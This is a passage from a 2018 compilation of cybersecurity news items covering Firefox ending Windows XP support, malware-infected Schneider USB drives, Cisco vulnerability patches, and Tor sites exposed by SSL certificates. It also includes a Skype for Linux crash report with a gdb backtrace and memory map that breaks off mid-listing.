The agencies' operations appear to both compete and cooperate.

Pavel Felgenhauer, an independent Moscow-based military analyst, told The Associated Press that if "the SVR runs into military intelligence, they have to share it with the GRU; that means they try not to run into military intelligence and tell their agents not to report anything military even if they know it. The other way around, military or GRU assets are asked never to report anything political."

But in the case of the alleged U.S. election-related hacking, he said, "I believe that was an inter-service operation, because it's not military but they gained some kind of hacking access and then they shared it with the FSB and the SVR."


Firefox Drops Support for Windows XP
6.9.2018 securityweek Safety

Effective this week, Windows XP is no longer supported by Firefox. More than four years after Microsoft stopped supporting the platform, Mozilla is making a similar move.

Last year, the organization said support for Windows XP was expected to be dropped by June 2018, but the browser developer took a few more months to make that happen.

On Wednesday, Mozilla announced the release of Firefox 62 and also revealed that it updated Firefox ESR (Extended Support Release) to version 60.2. With these releases, Mozilla cut support for Firefox ESR 52, which was the last version of Firefox with Windows XP support.

“At the end of February 2016, XP users made up 12% of release Firefox. By the end of February 2017, XP users made up 8% of release Firefox. If this trend continued without much change after we switched XP users to ESR, XP Firefox users would presently amount to about 2% of release users,” Mozilla says.

While Firefox ESR 52 continues to be available for download, it no longer receives security patches, meaning that any vulnerability found in the browser will remain unpatched.

With Chrome no longer supporting the platform since version 49 and Internet Explorer 8, the browser most used as standard on the platform, getting no security updates for more than two years, Windows XP users are left with no major browser than could keep them safe from exploits while navigating the Internet.

Although still widely used in organizations, Windows XP is currently a nearly-17-year-old operating system that hasn’t received security patches for over four years (although Microsoft did release emergency fixes last year, to address Shadow Brokers-related bugs exploited in the global WannaCry outbreak).

“It required effort, and it required devoting resources to supporting XP well after Microsoft stopped doing so. It meant we couldn’t do other things, since we were busy with XP,” Mozilla says.

Users impacted by the recent change in Firefox are advised to upgrade to a newer operating system to continue receiving patches not only for Mozilla’s applications, but also for other software their computers depend on.

In addition to dropping support for XP, Firefox now includes a preference that allows users to distrust certificates issued by Symantec (by setting "security.pki.distrust_ca_policy" to 2 in about:config). This is yet another step towards removing all trust for Symantec-issued certificates in Firefox 63.

Firefox 62, Mozilla notes in an advisory, also addresses several vulnerabilities: 1 Critical severity, 3 High risk, 2 Medium severity, and 3 Low risk. Affecting Firefox 61 and Firefox ESR 60.1, the most important of these could potentially be exploited to run arbitrary code.


Malware Found on USB Drives Shipped With Schneider Solar Products
6.9.2018 securityweek ICS

Schneider Electric recently informed customers that some of the USB flash drives shipped by the company with its Conext ComBox and Conext Battery Monitor products were infected with malware.

Conext ComBox and Conext Battery Monitor are both part of Schneider’s solar energy offering. ComBox is a communications and monitoring device for installers and operators of Conext solar systems, while Battery Monitor is designed to indicate hours of battery-based runtime and determine the charging state for a battery bank.

According to Schneider, some USB removable media devices shipped with these products were exposed to malware during manufacturing at a third-party supplier’s facility.USB drives shipped by Schneider Electric for Conext products infected with malware

While the France-based industrial giant says the malware should be blocked by all major cybersecurity products, it has advised customers not to use and “securely discard” the compromised devices.

“These USB removable media contain user documentation and non-essential software utilities. They do not contain any operational software and are not required for the installation, commissioning, or operation of the products mentioned above. This issue has no impact on the operation or security of the Conext Combox or Conext Battery Monitor products,” Schneider said in an advisory published last month.

Users who believe they may have accessed one of the potentially impacted flash drives have been advised to perform a full scan of their system. The problematic drives have been shipped with all versions of Conext ComBox (sku 865-1058) and all versions of Conext Battery Monitor (sku 865-1080-01).

SecurityWeek has reached out to Schneider to obtain more information regarding the incident, including how many customers were affected and the type of malware found on the devices, but the company has yet to respond.

USB drives shipped by Schneider Electric for Conext products infected with malware

Incidents involving major companies delivering USB drives infected with malware along the supply chain are not unheard of. Last year, IBM informed customers that it had been shipping malware-infected initialization USBs for its Storwize storage systems, which are used by Lenovo.

The pieces of malware involved in these incidents may not have been advanced, but infected USB drives can pose a serious threat to organizations – particularly in industrial environments where air-gapping is often still used to protect critical systems – and sophisticated threat actors have been known to develop complex USB malware.


Cisco fixes 32 security vulnerabilities in its products, including three critical flaws
6.9.2018 securityaffairs
Vulnerebility

Cisco has released thirty security patch advisory to address a total of 32 security vulnerabilities in its products, including three critical flaws.
Cisco released thirty security patch advisory to address a total of 32 security vulnerabilities in its products.

The good news is that the tech giant is not aware of any exploitation of the addressed vulnerabilities in attacks in the wild.

Three flaws are rated as critical, one of them is the recently discovered CVE-2018-11776 Apache Struts remote code execution vulnerability.

The other critical issues addressed by Cisco are the Cisco Umbrella API Unauthorized Access Vulnerability (CVE-2018-0435) and the Cisco RV110W, RV130W, and RV215W Routers Management Interface Buffer Overflow Vulnerability (CVE-2018-0423).

The “critical” flaw CVE-2018-0435 affects Cisco Umbrella API, a remote authenticated attacker could leverage the vulnerability to read or modify data across multiple organizations.

“A vulnerability in the Cisco Umbrella API could allow an authenticated, remote attacker to view and modify data across their organization and other organizations.” reads the security advisory.

“The vulnerability is due to insufficient authentication configurations for the API interface of Cisco Umbrella. An attacker could exploit this vulnerability to view and potentially modify data for their organization or other organizations. A successful exploit could allow the attacker to read or modify data across multiple organizations.”

The vulnerability has been addressed in the API, this means that no action is requested for the end-users.

The Umbrella solution is also affected by other high severity vulnerabilities, two flaws affect the Umbrella Enterprise Roaming client and attackers can exploit them by an authenticated attacker to elevate privileges to “Administrator.”

The second flaw addressed by Cisco is the CVE-2018-0423, a buffer overflow vulnerability that resides in the web-based management interface of several firewalls and routers belonging to the RV series. The flaw could be exploited by a remote and unauthenticated attacker to trigger a denial-of-service (DoS) condition or to execute arbitrary code.

“A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router could allow an unauthenticated, remote attacker to cause a denial of service condition or to execute arbitrary code.” reads the security advisory.

“The vulnerability is due to improper boundary restrictions on user-supplied input in the Guest user feature of the web-based management interface. An attacker could exploit this vulnerability by sending malicious requests to a targeted device, triggering a buffer overflow condition. A successful exploit could allow the attacker to cause the device to stop responding, resulting in a denial of service condition, or could allow the attacker to execute arbitrary code.”

The flaw could be exploited by an attacker by sending malicious requests to a targeted device, triggering a buffer overflow condition.

Cisco issued security updates for serious privilege escalation and information disclosure flaws in WebEx, a DoS flaw in Prime Access Registrar, two command injections in the Integrated Management Controller (IMC) software, and a privilege escalation in Data Center Network Manager.


Many misconfigured Tor sites expose the public IP address via SSL certificates
6.9.2018 securityaffairs Safety

Security researcher discovered that many misconfigured Tor sites using SSL certificated could expose the public IP addresses of underlying servers.
Yonathan Klijnsma, a threat researcher at RiskIQ, has discovered that many misconfigured Tor sites using SSL certificated could expose the public IP addresses of underlying servers.

Properly configured servers hosting hidden services have to listen only on the localhost (127.0.0.1) instead of any other public IP address.

“The way these guys are messing up is that they have their local Apache or Nginx server listening on any (* or 0.0.0.0) IP address, which means Tor connections will work obviously, but also external connections will as well,”

Klijnsma explained to BleepingComputer. “This is especially true if they don’t use a firewall. These servers should be configured to only listen on 127.0.0.1.”

The expert highlighted that it is quite easy to find misconfigured servers that expose their public IP address.

Every time an administrator of a hidden service adds an SSL certificate to a site, it associates the .onion domain with the certificate. The Common Name (CN) field of the certificate reports the .onion address of the hidden service.

Tor sites IP address

When administrators misconfigure a server so that it listens on a public IP address, the SSL certificate associated with the website will be used for the public IP address.

Klijnsma discovered the misconfigured servers by crawling the Internet and associating SSL certificates to they’re hosted IP addressed. In this way, the expert discovered the misconfigured hidden Tor services and the corresponding public IP addressed.

Yonathan Klijnsma

@ydklijnsma
Another #Tor hidden service exposed through an incorrect configuration of the listening server. Hiding your private forum on the deep dark (and still very public) web. Certificate can be found here (host is still live!): https://community.riskiq.com/search/certificate/sha1/ec14a4bc60fa9088ff59b28f094c1876388e6f94 …

7:31 PM - Aug 4, 2018
264
159 people are talking about this
Twitter Ads info and privacy
The expert concluded that to avoid the exposure of the public IP address for a Tor hidden service it should only listen on 127.0.0.1.


An untold story of a memory corruption bug in Skype
6.9.2018 securityaffairs Cyber

Security expert discovered that Skype has a malloc(): memory corruption vulnerability that could be triggered while users share some media/file with someone during a call.
Tested on: Linux zero 4.15.0-29-generic #31-Ubuntu SMP Tue Jul 17 15:39:52 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux (Ubuntu 18.04 LTS)
Product affected: Skype for linux (skypeforlinux_8.27.0.85_amd64.deb)Steps to reproduce this issue:
1. Open Skype
2. Call anyone
3. During the call try sharing the media or files to the same person
4. The Skype gets crash.
While on a call with one of my colleague, I tried sharing a file which froze my Skype and then it gets crash. However, moving further I tried to debug it with `gdb` and this is what Igot.

$ *** Error in `/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896': malloc(): memory corruption: 0x000000000641ff80 ***
======= Backtrace: =========
/snap/core/current/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7fb57d6b97e5]
/snap/core/current/lib/x86_64-linux-gnu/libc.so.6(+0x8213e)[0x7fb57d6c413e]
/snap/core/current/lib/x86_64-linux-gnu/libc.so.6(__libc_malloc+0x54)[0x7fb57d6c6184]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896(malloc+0x1c)[0x47cc34c]
/snap/skype/51/usr/share/skypeforlinux/../../../lib/x86_64-linux-gnu/libglib-2.0.so.0(g_malloc+0x19)[0x7fb57ff91719]
/snap/skype/51/usr/share/skypeforlinux/../../../lib/x86_64-linux-gnu/libglib-2.0.so.0(+0x8508d)[0x7fb57ffc708d]
/snap/skype/51/usr/share/skypeforlinux/../../../lib/x86_64-linux-gnu/libglib-2.0.so.0(g_variant_get_data+0x1f)[0x7fb57ffc72ff]
/snap/skype/51/usr/share/skypeforlinux/../../../lib/x86_64-linux-gnu/libglib-2.0.so.0(g_variant_get+0xda)[0x7fb57ffc610a]
/usr/lib/x86_64-linux-gnu/gio/modules/libgioremote-volume-monitor.so(+0xc873)[0x7fb57314b873]
/usr/lib/x86_64-linux-gnu/gio/modules/libgioremote-volume-monitor.so(+0x10f2e)[0x7fb57314ff2e]
/usr/lib/x86_64-linux-gnu/gio/modules/libgioremote-volume-monitor.so(+0x11dcb)[0x7fb573150dcb]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgobject-2.0.so.0(+0x15ad8)[0x7fb5824c3ad8]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgobject-2.0.so.0(g_object_newv+0xd1)[0x7fb5824c4c01]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgobject-2.0.so.0(g_object_new+0x104)[0x7fb5824c5534]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgio-2.0.so.0(g_volume_monitor_get+0x7c)[0x7fb582798ebc]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgtk-3.so.0(+0x25c3d5)[0x7fb583ba53d5]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgobject-2.0.so.0(g_type_create_instance+0x1f9)[0x7fb5824e1359]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgobject-2.0.so.0(+0x1531b)[0x7fb5824c331b]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgobject-2.0.so.0(g_object_newv+0xd1)[0x7fb5824c4c01]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgtk-3.so.0(+0x11a75a)[0x7fb583a6375a]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgtk-3.so.0(+0x11ce73)[0x7fb583a65e73]
/snap/skype/51/usr/share/skypeforlinux/../../../lib/x86_64-linux-gnu/libglib-2.0.so.0(+0x4d5a3)[0x7fb57ff8f5a3]
/snap/skype/51/usr/share/skypeforlinux/../../../lib/x86_64-linux-gnu/libglib-2.0.so.0(g_markup_parse_context_parse+0xfc3)[0x7fb57ff90763]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgtk-3.so.0(+0x11d8d6)[0x7fb583a668d6]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgtk-3.so.0(gtk_builder_extend_with_template+0x1a8)[0x7fb583a61b78]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgtk-3.so.0(gtk_widget_init_template+0x107)[0x7fb583cabe07]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgtk-3.so.0(+0x1ae4f1)[0x7fb583af74f1]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgobject-2.0.so.0(g_type_create_instance+0x1f9)[0x7fb5824e1359]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgobject-2.0.so.0(+0x1531b)[0x7fb5824c331b]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgobject-2.0.so.0(g_object_newv+0xd1)[0x7fb5824c4c01]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgtk-3.so.0(+0x11a75a)[0x7fb583a6375a]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgtk-3.so.0(+0x11bb65)[0x7fb583a64b65]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgtk-3.so.0(+0x11d4f1)[0x7fb583a664f1]
/snap/skype/51/usr/share/skypeforlinux/../../../lib/x86_64-linux-gnu/libglib-2.0.so.0(+0x4d6d7)[0x7fb57ff8f6d7]
/snap/skype/51/usr/share/skypeforlinux/../../../lib/x86_64-linux-gnu/libglib-2.0.so.0(g_markup_parse_context_parse+0xd8e)[0x7fb57ff9052e]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgtk-3.so.0(+0x11d8d6)[0x7fb583a668d6]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgtk-3.so.0(gtk_builder_extend_with_template+0x1a8)[0x7fb583a61b78]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgtk-3.so.0(gtk_widget_init_template+0x107)[0x7fb583cabe07]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgtk-3.so.0(+0x1a773e)[0x7fb583af073e]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgobject-2.0.so.0(g_type_create_instance+0x1f9)[0x7fb5824e1359]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgobject-2.0.so.0(+0x1531b)[0x7fb5824c331b]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgobject-2.0.so.0(g_object_new_valist+0x3b5)[0x7fb5824c51b5]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgobject-2.0.so.0(g_object_new+0xf1)[0x7fb5824c5521]
/snap/skype/51/usr/share/skypeforlinux/../../lib/x86_64-linux-gnu/libgtk-3.so.0(gtk_file_chooser_dialog_new+0x74)[0x7fb583af1294]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x4e3b90b]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896(_ZN11file_dialog14ShowOpenDialogERKNS_14DialogSettingsERKN4base8CallbackIFvbRKSt6vectorINS3_8FilePathESaIS6_EEELNS3_8internal8CopyModeE1ELNSC_10RepeatModeE1EEE+0x2d)[0x4e3be3d]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896(_ZN4atom15WebDialogHelper14RunFileChooserEPN7content15RenderFrameHostERKNS1_17FileChooserParamsE+0x33c)[0x4e4d90c]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x1d8c9b4]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x1d8c858]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x1d86c2f]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x2347525]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x48001eb]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x47ed9db]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x47edcf8]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x47ee0d1]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x47c4159]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x47affc0]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x1bfef9e]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x1bfed9e]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x1d65ead]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x1e67b93]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x1a4c63c]
/snap/skype/51/usr/share/skypeforlinux/skypeforlinux --executed-from=/home/input0 --pid=6896[0x19e6d0d]
======= Memory map: ========
000dc000-00200000 rw-p 00000000 07:15 15088 /snap/skype/51/usr/share/skypeforlinux/skypeforlinux
00200000-01802000 r--p 00124000 07:15 15088 /snap/skype/51/usr/share/skypeforlinux/skypeforlinux
01802000-04f35000 r-xp 01726000 07:15 15088 /snap/skype/51/usr/share/skypeforlinux/skypeforlinux
04f35000-04f4b000 rw-p 04e59000 07:15 15088 /snap/skype/51/usr/share/skypeforlinux/skypeforlinux
04f4b000-05818000 rw-p 00000000 00:00 0
06322000-0749a000 rw-p 00000000 00:00 0 [heap]
af8f00000-af8f80000 rw-p 00000000 00:00 0
2a231d00000-2a231d80000 rw-p 00000000 00:00 0
4342f600000-4342f6ab000 rw-p 00000000 00:00 0
4dab7f00000-4dab800a000 rw-p 00000000 00:00 0
5e2b1980000-5e2b1a00000 rw-p 00000000 00:00 0
683f0500000-683f0580000 rw-p 00000000 00:00 0
74c45800000-74c45880000 rw-p 00000000 00:00 0
7f95e280000-7f95e300000 rw-p 00000000 00:00 0
8590f380000-8590f400000 rw-p 00000000 00:00 0
a95ac180000-a95ac200000 rw-p 00000000 00:00 0
b464c9b8000-b464c9c0000 rw-p 00000000 00:00 0
b464c9c0000-b464c9c4000 ---p 00000000 00:00 0
bf52cd00000-bf52cd80000 rw-p 00000000 00:00 0
c191e080000-c191e100000 rw-p 00000000 00:00 0
fe78f400000-fe78f480000 rw-p 00000000 00:00 0
14c588080000-14c588100000 rw-p 00000000 00:00 0
16dfa8300000-16dfa8380000 rw-p 00000000 00:00 0
1b328cb00000-1b328cb80000 rw-p 00000000 00:00 0
1de101180000-1de101200000 rw-p 00000000 00:00 0
1e993f000000-1e993f080000 rw-p 00000000 00:00 0
20c071f00000-20c071f80000 rw-p 00000000 00:00 0
20c61d680000-20c61d700000 rw-p 00000000 00:00 0
2240c1900000-2240c19ab000 rw-p 00000000 00:00 0
22628d700000-22628d780000 rw-p 00000000 00:00 0
25bf77500000-25bf77580000 rw-p 00000000 00:00 0
26ce1a280000-26ce1a300000 rw-p 00000000 00:00 0
26daf9ead000-26daf9f00000 ---p 00000000 00:00 0
26daf9f00000-26daf9f03000 rw-p 00000000 00:00 0
26daf9f03000-26daf9f04000 ---p 00000000 00:00 0
26daf9f04000-26daf9f2d000 rwxp 00000000 00:00 0
26daf9f2d000-26daf9f80000 ---p 00000000 00:00 0
26daf9f80000-26daf9f83000 rw-p 00000000 00:00 0
26daf9f83000-26daf9f84000 ---p 00000000 00:00 0
26daf9f84000-26daf9fad000 rwxp 00000000 00:00 0
26daf9fad000-26dafa000000 ---p 00000000 00:00 0
26dafa000000-26dafa003000 rw-p 00000000 00:00 0
26dafa003000-26dafa004000 ---p 00000000 00:00 0
26dafa004000-26dafa02d000 rwxp 00000000 00:00 0
26dafa02d000-26dafa080000 ---p 00000000 00:00 0
26dafa080000-26dafa083000 rw-p 00000000 00:00 0
26dafa083000-26dafa084000 ---p 00000000 00:00 0
26dafa084000-26dafa0ff000 rwxp 00000000 00:00 0
26dafa0ff000-26dafa100000 ---p 00000000 00:00 0
26dafa100000-26dafa103000 rw-p 00000000 00:00 0
26dafa103000-26dafa104000 ---p 00000000 00:00 0
26dafa104000-26dafa17f000 rwxp 00000000 00:00 0
26dafa17f000-26dafa180000 ---p 00000000 00:00 0
26dafa180000-26dafa183000 rw-p 00000000 00:00 0
26dafa183000-26dafa184000 ---p 00000000 00:00 0
26dafa184000-26dafa1ff000 rwxp 00000000 00:00 0
26dafa1ff000-26dafa200000 ---p 00000000 00:00 0
26dafa200000-26dafa203000 rw-p 00000000 00:00 0
26dafa203000-26dafa204000 ---p 00000000 00:00 0
26dafa204000-26dafa27f000 rwxp 00000000 00:00 0
26dafa27f000-26db19ead000 ---p 00000000 00:00 0
2adf28e80000-2adf28f00000 rw-p 00000000 00:00 0
2b4467900000-2b4467980000 rw-p 00000000 00:00 0
2bb8adb80000-2bb8adc00000 rw-p 00000000 00:00 0
2dadb8480000-2dadb8500000 rw-p 00000000 00:00 0
2fa869080000-2fa869100000 rw-p 00000000 00:00 0
325d21200000-325d21280000 rw-p 00000000 00:00 0
3462c4b00000-3462c4b80000 rw-p 00000000 00:00 0
34a98af80000-34a98b000000 rw-p 00000000 00:00 0
34efe4300000-34efe4380000 rw-p 00000000 00:00 0
355999380000-355999400000 rw-p 00000000 00:00 0
35c8d9680000-35c8d9685000 rw-p 00000000 00:00 0
36fd03c00000-36fd03c80000 rw-p 00000000 00:00 0
371ab4200000-371ab4280000 rw-p 00000000 00:00 0
37e430000000-37e430080000 rw-p 00000000 00:00 0
37f3b2f00000-37f3b2f80000 rw-p 00000000 00:00 0
389966a80000-389966b8a000 rw-p 00000000 00:00 0
3ad500400000-3ad500480000 rw-p 00000000 00:00 0
3aff91d80000-3aff91de2000 rw-p 00000000 00:00 0
3b2f0d680000-3b2f0d700000 rw-p 00000000 00:00 0
3fba22080000-3fba22100000 rw-p 00000000 00:00 0
7fb4bfffc000-7fb4c3ffd000 rw-s 00000000 00:1a 116 /dev/shm/pulse-shm-3506809168
7fb4c3ffd000-7fb4c7ffe000 rw-s 00000000 00:1a 115 /dev/shm/pulse-shm-136900218
7fb4c7ffe000-7fb4cbfff000 rw-s 00000000 00:1a 95 /dev/shm/pulse-shm-1835135660
7fb4cbfff000-7fb4d0000000 rw-s 00000000 00:1a 93 /dev/shm/pulse-shm-465478744
7fb4d0000000-7fb4d0029000 rw-p 00000000 00:00 0
7fb4d0029000-7fb4d4000000 ---p 00000000 00:00 0
7fb4d615e000-7fb4d615f000 ---p 00000000 00:00 0
7fb4d615f000-7fb4d695f000 rw-p 00000000 00:00 0
7fb4d695f000-7fb4d6960000 ---p 00000000 00:00 0
7fb4d6960000-7fb4d7160000 rw-p 00000000 00:00 0
7fb4d7160000-7fb4d7180000 rw-s 00000000 00:1a 195 /dev/shm/.org.chromium.Chromium.5U4VoF (deleted)
7fb4d7180000-7fb4d71c0000 rw-s 00000000 00:1a 194 /dev/shm/.org.chromium.Chromium.RLeLh9 (deleted)
7fb4d71c0000-7fb4d71e0000 rw-s 00000000 00:1a 185 /dev/shm/.org.chromium.Chromium.vuEDaD (deleted)
7fb4d71e0000-7fb4d7220000 rw-s 00000000 00:1a 124 /dev/shm/.org.chromium.Chromium.QXky36 (deleted)
7fb4d7260000-7fb4d72a0000 rw-s 00000000 00:1a 190 /dev/shm/.org.chromium.Chromium.iNwIs3 (deleted)
7fb4d72a0000-7fb4d72e0000 rw-s 00000000 00:1a 189 /dev/shm/.org.chromium.Chromium.TCc7Dx (deleted)
7fb4d7320000-7fb4d7340000 rw-s 00000000 00:1a 153 /dev/shm/.org.chromium.Chromium.niC6By (deleted)
7fb4d7340000-7fb4d7380000 rw-s 00000000 00:1a 184 /dev/shm/.org.chromium.Chromium.Bckk6z (deleted)
7fb4d7380000-7fb4d73c0000 rw-s 00000000 00:1a 183 /dev/shm/.org.chromium.Chromium.cjU5H8 (deleted)
7fb4d73c0000-7fb4d7400000 rw-s 00000000 00:1a 182 /dev/shm/.org.chromium.Chromium.T0uSjH (deleted)
7fb4d7400000-7fb4d7440000 rw-s 00000000 00:1a 181 /dev/shm/.org.chromium.Chromium.QW3FVf (deleted)
7fb4d7440000-7fb4d7480000 rw-s 00000000 00:1a 180 /dev/shm/.org.chromium.Chromium.VUxuxO (deleted)
7fb4d74c0000-7fb4d7500000 rw-s 00000000 00:1a 178 /dev/shm/.org.chromium.Chromium.HikaLV (deleted)
7fb4d7640000-7fb4d7680000 rw-s 00000000 00:1a 171 /dev/shm/.org.chromium.Chromium.4UVv2P (deleted)
7fb4d7680000-7fb4d76c0000 rw-s 00000000 00:1a 170 /dev/shm/.org.chromium.Chromium.BpeuEo (deleted)
7fb4d7700000-7fb4d7740000 rw-s 00000000 00:1a 168 /dev/shm/.org.chromium.Chromium.vB2tSv (deleted)
7fb4d7780000-7fb4d77c0000 rw-s 00000000 00:1a 166 /dev/shm/.org.chromium.Chromium.8lIy6C (deleted)
7fb4d7840000-7fb4d7880000 rw-s 00000000 00:1a 162 /dev/shm/.org.chromium.Chromium.aN74AR (deleted)
7fb4d7880000-7fb4d78c0000 rw-s 00000000 00:1a 161 /dev/shm/.org.chromium.Chromium.ExRifq (deleted)
7fb4d78c0000-7fb4d7900000 rw-s 00000000 00:1a 160 /dev/shm/.org.chromium.Chromium.O1MxTY (deleted)
7fb4d7940000-7fb4d7980000 rw-s 00000000 00:1a 158 /dev/shm/.org.chromium.Chromium.mxd5b6 (deleted)
7fb4d79c0000-7fb4d7a00000 rw-s 00000000 00:1a 156 /dev/shm/.org.chromium.Chromium.byaHud (deleted)
7fb4d7a40000-7fb4d7a80000 rw-s 00000000 00:1a 132 /dev/shm/.org.chromium.Chromium.2FEnNk (deleted)
7fb4d7ac0000-7fb4d7b00000 rw-s 00000000 00:1a 130 /dev/shm/.org.chromium.Chromium.HFba6r (deleted)
7fb4d7b00000-7fb4d7b40000 rw-s 00000000 00:1a 129 /dev/shm/.org.chromium.Chromium.tFrAK0 (deleted)
7fb4d7b40000-7fb4d7b80000 rw-s 00000000 00:1a 152 /dev/shm/.org.chromium.Chromium.4rXuc5 (deleted)
7fb4d7b80000-7fb4d7bc0000 rw-s 00000000 00:1a 151 /dev/shm/.org.chromium.Chromium.ei9cxE (deleted)
7fb4d7f40000-7fb4d7f80000 rw-s 00000000 00:1a 146 /dev/shm/.org.chromium.Chromium.hbGEFc (deleted)
7fb4d7fc0000-7fb4d8000000 rw-s 00000000 00:1a 144 /dev/shm/.org.chromium.Chromium.TaWipl (deleted)
7fb4d8000000-7fb4d803c000 rw-p 00000000 00:00 0
7fb4d803c000-7fb4dc000000 ---p 00000000 00:00 0
7fb4dc000000-7fb4dc021000 rw-p 00000000 00:00 0
7fb4dc021000-7fb4e0000000 ---p 00000000 00:00 0
7fb4e0000000-7fb4e0022000 rw-p 00000000 00:00 0
7fb4e0022000-7fb4e4000000 ---p 00000000 00:00 0
7fb4e4030000-7fb4e4094000 rw-s 00000000 00:1a 111 /dev/shm/.org.chromium.Chromium.7I5ZtW (deleted)
7fb4e4094000-7fb4e40f4000 rw-s 00000000 00:1a 100 /dev/shm/.org.chromium.Chromium.L6QAhS (deleted)
7fb4e40f4000-7fb4e4154000 rw-s 00000000 00:1a 91 /dev/shm/.org.chromium.Chromium.Sf8WzY (deleted)
7fb4e4154000-7fb4e4155000 ---p 00000000 00:00 0
7fb4e4155000-7fb4e4955000 rw-p 00000000 00:00 0
7fb4e4995000-7fb4e49d5000 rw-s 00000000 00:1a 137 /dev/shm/.org.chromium.Chromium.Hx0IZk (deleted)
7fb4e49d5000-7fb4e637d000 r-xp 00000000 08:01 26878205 /usr/lib/x86_64-linux-gnu/libicudata.so.60.2
7fb4e637d000-7fb4e657c000 ---p 019a8000 08:01 26878205 /usr/lib/x86_64-linux-gnu/libicudata.so.60.2
7fb4e657c000-7fb4e657d000 r--p 019a7000 08:01 26878205 /usr/lib/x86_64-linux-gnu/libicudata.so.60.2
7fb4e657d000-7fb4e657e000 rw-p 019a8000 08:01 26878205 /usr/lib/x86_64-linux-gnu/libicudata.so.60.2
7fb4e657e000-7fb4e6721000 r-xp 00000000 08:01 26878215 /usr/lib/x86_64-linux-gnu/libicuuc.so.60.2
7fb4e6721000-7fb4e6920000 ---p 001a3000 08:01 26878215 /usr/lib/x86_64-linux-gnu/libicuuc.so.60.2
7fb4e6920000-7fb4e6933000 r--p 001a2000 08:01 26878215 /usr/lib/x86_64-linux-gnu/libicuuc.so.60.2
7fb4e6933000-7fb4e6934000 rw-p 001b5000 08:01 26878215 /usr/lib/x86_64-linux-gnu/libicuuc.so.60.2
7fb4e6934000-7fb4e6935000 rw-p 00000000 00:00 0
7fb4e6935000-7fb4e6bc7000 r-xp 00000000 08:01 26878207 /usr/lib/x86_64-linux-gnu/libicui18n.so.60.2
7fb4e6bc7000-7fb4e6dc6000 ---p 00292000 08:01 26878207 /usr/lib/x86_64-linux-gnu/libicui18n.so.60.2
7fb4e6dc6000-7fb4e6dd5000 r--p 00291000 08:01 26878207 /usr/lib/x86_64-linux-gnu/libicui18n.so.60.2
